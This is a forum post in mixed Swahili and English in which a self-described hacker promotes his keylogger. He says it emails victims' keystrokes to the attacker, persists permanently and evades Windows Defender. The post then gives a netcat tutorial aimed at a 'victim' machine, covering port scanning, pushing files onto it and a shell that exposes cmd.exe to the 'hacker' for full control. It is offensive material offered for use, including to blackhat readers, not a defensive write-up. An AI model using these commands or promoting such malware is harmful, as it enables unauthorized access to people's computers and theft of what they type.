Thefreedom
JF-Expert Member
- Jan 27, 2019
- 319
- 313
TSUP ladies and gentlemen ........
Thefreedom is hereeeeeeeeeeeeeeeeeeeeeeeeee.
leo lets share together something good wewe an ethical hacker, blackhat hackers, beginers n.k
unaweza ukafanya mastering ur hacking skills na Thefreedom
kwa wale hawanifahamu na ndo mara ya kwanza >>>>>malengo yetu ni kushare ideas
just follow me hapa na code cool stuffs (hacking tools) https://github.com/mRanonyMousTZ
my new tool UPdated you are free kuitest pia kuongezea viungo >>>jiko letu sote so lets cook
check it out hapa https://github.com/mRanonyMousTZ/mr-robot-keylogger-2019
features zake
1. ina record kila kinachoandikwa na victim na kusend kwenye email yako (gmail)
2. ina tengeneza persistence life time
3. ina bypass all updates za windows defender
4.Works with Linux and Windows. yani utahack platforms mbili windows na linux
5. NO SPAMM EMAIL
Baada ya kusema hayo twende tukaaanze .......
leo nitaongelea ADVANCE NETWORK BACKDOOR IN WINDOWS PC USING MSF NA NETCAT
Nini maana ya NETCAT????
hili swali huwa lina tatiza sana kwasababu netcat kila mtu ana define kivyake kutokana na matumizi .
lakin mimi kama mimi naweza sema huu ni upanga ambao kazi yake ni kukata, kusoma na kuandika information kwenye network kwa kutumia TCP or UDP protocols >>>EASY
WATU wengine wana define hivi.....
1. hiii ni tool kazi yake ni kuscan na ku open port kwenye network connections
2. mwingine anaweza sema hii ni tool ya kusend packets na files between 2 hosts based on their IPS
3. programmers nao waasema hii natumia kutest reverse connections between 2 systems
YANI NI NYINGI SANA ..................kila mtu anatakaye define netcat kwa vile anavyoitumia yuko sahihi....
SASA kama ulikuwa hauna ujuzi nayo leo nitakufunza jinsi gani hiii NETCAT inavyoweza kufanya system backdoor, persistence na kuhack each and everything kwenye microsoft windows pia hata kwenye linux based operating system.
NOTE : KABLA HATUJAAANZA LAZIMA UJUE KUITUMIA HII NETCAT IN ADVANCE ESPECIAL IN HACKING
Sasa basi nitaenda very fast kukuonesha vingere na uses muhimu za kujua ili Next time nikija nikianza how to hack hzoo system using nc (netcat backdoor ) usiwe mdomo wazi.....saSA lets study netcat how to use kwa mifano rahisi sana kama ifuatavyo.
1. KUSCAN na KU OPEN PORTS
netcat hutumika kuscan ports na hapa nitabase na linux OS kama hacker machine na my windows 10 pro ndio victim machine ....all these ziko connected in a same networks with my router.
kwenye Terminal ya kali linux kuscan a target victim ip tye
nc -nvz "Target Ip" 1-100
hapo system itascan open ports range 1-100 kama unavyoona hapo kwenye my pc
kama unaona port 50 kwenye my victim machine ipo open na hii nimeisababisha cuz nimeopen port kwenye my wn 10 machine kutumia ncat ( install nmap for windows utaipata ncat ndani yake)
katika wn 10 nimeopen port 50 using
ncat -nvlp 50
inamaaanisha kwamba connection yyte itakayo kuja kwenye hio port itakuwa annalyzed
so hivi ndivyo kuscan port na ku open port using ncat
2. KUCONNECT KWENYE HIO OPEN PORT na KUCHAT NA VICTIM USING TERMINAL
hapo juu tumeweza kuscann na ku open port sasa hapa tuta connect kwenye hio open port na kutengeneza chatting conservation like whatsap.
nitaanza na ku open port n ku listen any connection in my windows 10 pro
ncat.exe -nvlp 50
kisha Ntaingia in my kali machine na ku connect kwenye hio port using
nc -nv "target ip" 50
KAMA unavyoona unaweza test kwa mda wakoooooooooooo
3. TRANSFERING FILES
pia tunaweza tumiana files kupitia nc ( netcat)
kama kawa ida fungua terminal ya windows (CMD)
ncat.exe -nvlp 50 > d:\filename.zip kama ni zip file
hii inamaana itasave hilo file soon ikipata connection kwenye hio port ambayo itakuja na same file name + extention kweny hio open port 50 .....sasa me nitaonesha txt file ilivyokuwa kwenye linux ukifungua ipo ivi
sasa windows pc italisten connection na nitaenda directory ambayo ni ile file kwenye linux kisha nitacommand hivi
nc -nv 192.168.23.1 50 < freedom.txt
na soon nikipress enter kwa kuwa nimewasha wn 10 as listener itapata connection yangu kupitia ile port na kusave ile file kwenye pc yake ya victim
na kulicheck file just type
type d:\freedom.txt kwenye wn 10 utaona file litakupa ujumbe same as ule kwenye linux
4. REVERSE SHELL PRACTICAL
Tunaweza fanya reverse shell practical yani tunaweza export CMD ya pc iende kwenye PC ya hacker
kama kawaida utarun hii command kwenye wn yaani victim PC
ncat.exe -nvlp 50 -e cmd.exe
HII inamaanisha ita export windows command prompt iende kwa hacker machine
na mimi kwny linux na connect to use
nc -nv "target IP" 50
nitapata CMD yake na naweza fanya lolote
5. SECURED CONNECTION (SSL)
hapa ni kwamba hii connection unaweza i secure na SSL na kufanya hivo add --ssl mbele ya command zako
practize urself
6. inject security in a connection
hpa utaadd command ambazo zitachagua IP YA ku connect kwenye pc ya victim
mfano ncat.exe -nvlp 50 --allow "hapa utaweka ip ya pc ambayo itakuwa connected "
THANKS MUCH WE WILL MEET AGAIN KWENYE HOW TO MAKE SOMETHING SHIT ON THIS
PEACE